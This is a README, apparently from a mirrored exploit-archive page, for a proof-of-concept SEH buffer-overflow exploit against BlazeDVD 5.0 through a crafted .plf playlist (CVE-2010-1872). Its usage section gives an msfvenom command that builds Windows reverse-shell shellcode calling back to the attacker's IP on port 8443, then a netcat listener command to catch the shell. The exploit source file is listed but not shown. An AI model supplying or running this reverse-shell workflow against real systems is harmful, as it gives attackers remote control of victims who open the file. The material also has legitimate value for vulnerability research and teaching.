关联漏洞
介绍
# BlazeDVD 5.0 - '.PLF' Playlist SEH Buffer Overflow Exploit (CVE-2010-1872)
Proof-of-Concept (PoC) exploit targeting a buffer overflow vulnerability in BlazeDVD version 5.0 via a crafted `.plf` playlist file. The exploit uses **SEH (Structured Exception Handler) overwrite** to achieve code execution.
## 📌 Details
- **Software:** BlazeDVD
- **Version:** 5.0
- **Vulnerability:** Buffer Overflow via `.plf` file
- **Technique:** Structured Exception Handler (SEH) Overwrite
- **CVE:** [CVE-2010-1872](https://nvd.nist.gov/vuln/detail/CVE-2010-1872)
- **Tested on:** Windows XP SP3 (DEP and ASLR disabled)
## ⚠️ Disclaimer
This code is for **educational and research purposes only**. Any misuse of this code may violate local or international laws. I do not take any responsibility for damage caused by improper use.
## 🧠 How It Works
The exploit generates a malicious `.plf` file which, when opened in BlazeDVD, triggers a buffer overflow and overwrites the SEH (Structured Exception Handler), redirecting execution to a reverse shell payload.
## 🛠️ Usage
1. **Generate the Shellcode with msfvenom**
Use `msfvenom` to create a reverse shell payload in raw format, avoiding bad characters.
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Replace the shellcode inside the exploit script with the output from msfvenom.
2. **Start Netcat (Listener)**
In another terminal, start listening on the selected port 8443:
```shell
nc -lvnp 8443
```
Catch the Reverse Shell
If successful, a reverse shell will connect to your listener.
文件快照
[4.0K] /data/pocs/3a0672780f0e661311fd838de2a2b63a6aa9575a
├── [3.6K] exploit.c
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。